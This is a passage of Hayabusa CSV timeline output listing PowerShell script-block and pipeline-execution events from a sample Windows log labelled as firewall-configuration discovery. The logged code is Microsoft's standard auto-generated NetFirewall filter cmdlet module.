$script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 
$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallAddressFilter.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.832 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," 1.0.0.0 NetFirewallApplicationFilter ",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.832 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { 
Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetApplicationFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallApplicationFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Program}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Package}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Program') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_values = @(${Program}) $__cmdletization_queryBuilder.FilterByProperty('AppPath', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Package') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Package}) $__cmdletization_queryBuilder.FilterByProperty('Package', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByApplication', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallApplicationFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallApplicationFilter' function Set-NetFirewallApplicationFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Program}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Package}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Program')) { [object]$__cmdletization_value = ${Program} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AppPath'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AppPath'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Package')) { [object]$__cmdletization_value = ${Package} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallApplicationFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallApplicationFilter'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
2021-10-25 16:23:05.848 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
2021-10-25 16:23:05.848 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
2021-10-25 16:23:05.848 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
2021-10-25 16:23:05.848 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
2021-10-25 16:23:05.848 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallApplicationFilter""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
2021-10-25 16:23:05.848 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallApplicationFilter""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
2021-10-25 16:23:05.848 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
2021-10-25 16:23:05.848 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-NetFirewallApplicationFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Program}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Package}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Program') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Program}) $__cmdletization_queryBuilder.FilterByProperty('AppPath', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Package') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Package}) $__cmdletization_queryBuilder.FilterByProperty('Package', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByApplication', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallApplicationFilter.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
2021-10-25 16:23:05.848 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Set-NetFirewallApplicationFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Program}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Package}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Program')) { [object]$__cmdletization_value = ${Program} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AppPath'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AppPath'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Package')) { [object]$__cmdletization_value = ${Package} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Package'; ParameterType = 'System.String'; 